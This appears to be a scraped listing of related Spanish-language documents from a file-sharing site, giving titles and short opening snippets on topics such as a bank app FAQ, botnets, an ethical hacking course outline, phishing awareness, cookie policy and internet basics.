FAQ Santander Twist JUNIO 2014 FAQ General Registro Menú Barra de Filtro Promoción App 2 FAQ General Cuál es la dirección de Santander Twist? La dirección es www.santandertwist.com.mx Qué se necesita para
Más detallesQué son y cómo combatirlas
Redes zombies Qué son y cómo combatirlas Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www..com Introducción Hoy en día podemos encontrar un elevado número de amenazas en la red, pero unas
Más detallesLa elección de Blogger como la plataforma o lugar donde
1. INTRODUCCIÓN La elección de Blogger como la plataforma o lugar donde alojar nuestro blog es adecuada si no deseamos complicarnos con la instalación de un servidor propio, con todo lo que ello conlleva:
Más detallesHacking Ético & Seguridad Ofensiva
Hacking Ético & Seguridad Ofensiva INDICE DATOS DEL CURSO OBJETIVOS DEL CURSO CONTENIDO MATERIALES Y RECURSOS DEL CURSO EVALUACION DATOS DEL CURSO Duración: 6 Jornadas (30horas), (08:00 am a 13:00 pm)
Más detallesFácil manipulación ya que no la recibirás físicamente evitando que se extravíe o deteriore.
FACTURA Electrónica ASPECTOS GENERALES La validez de una factura electrónica es exactamente la misma que una factura en papel y gracias a la certificación efectuada por el SRI se garantiza su integridad
Más detallesCOMO MEDIR LA EFECTIVIDAD DE LA CONCIENTIZACIÓN
COMO MEDIR LA EFECTIVIDAD DE LA CONCIENTIZACIÓN Ing. Carlos Ormella Meyer Los planes de concientización especialmente en seguridad de la información han sido muchas veces terreno fértil de opiniones discordantes,
Más detallesWindows Server 2012: Infraestructura de Escritorio Virtual
Windows Server 2012: Infraestructura de Escritorio Virtual Módulo 1: Application Virtualization Módulo del Manual Autores: James Hamilton-Adams, Content Master Publicado: 5 de Octubre 2012 La información
Más detallesRedes Sociales. Tema 2a
Redes Sociales Tema 2a Las redes sociales en Internet son comunidades virtuales donde sus usuarios interactúan con personas de todo el mundo con quienes encuentran gustos o intereses en común. Las redes
Más detallesTeléfono: +34-96-398-5300 Telefax: +34-96-196-1781 Email: csirtcv@gva.es https://www.facebook.com/csirtcv https://twitter.
Como identificar phishing Sobre CSIRT-cv CSIRT-cv es el Centro de Seguridad TIC de la Comunitat Valenciana. Nace en junio del año 2007, como una apuesta de la Generalitat Valenciana por la seguridad en
Más detallesPolítica de comunicación corporativa
Política de comunicación corporativa 1. Introducción Debemos tener presente que Todo comunica : Desde los e-mails que mandamos a nuestros clientes, proveedores, compañeros y demás colaboradores, hasta
Más detallesAlmacenar tus preferencias, como el idioma que has seleccionado o el tamaño de letra.
Política de Cookies Este sitio web, al igual que la mayoría de los sitios en Internet, usa Cookies para mejorar y optimizar la experiencia del usuario. A continuación encontrarás información detallada
Más detallesLISTA DE CONTROL DEL SERVICIO MÓVIL DE UNIVISION MOBILE
LISTA DE CONTROL DEL SERVICIO MÓVIL DE UNIVISION MOBILE Univision Mobile conecta a sus fieles seguidores con las personas, lugares y cosas que les encantan a diario. Para obtener más información, visita
Más detallesInternet, conceptos básicos
Internet, conceptos básicos IP (INTERNET PROTOCOL) Toda computadora tiene un número que la identifica en una red, este número es lo que llamamos IP, una dirección de IP típica se ve de esta manera Direcciones
Más detalles1 ÍNDICE... 3 Instalación... 4 Proceso de instalación en red... 6 Solicitud de Código de Activación... 11 Activación de Licencia... 14 2 3 REQUERIMIENTOS TÉCNICOS E INSTALACIÓN Requerimientos Técnicos
Más detallesUniversidad Galileo Fisicc-Idea Administración de Negocios Comercio Electrónico Sábados 11:00 a.m. Lic. Willy Alvarez
Universidad Galileo Fisicc-Idea Administración de Negocios Comercio Electrónico Sábados 11:00 a.m. Lic. Willy Alvarez Luis Miguel Quiñonez García 08282008 Franz Mark Ortiz Mérida 09182089 Mynor Rolando
Más detalles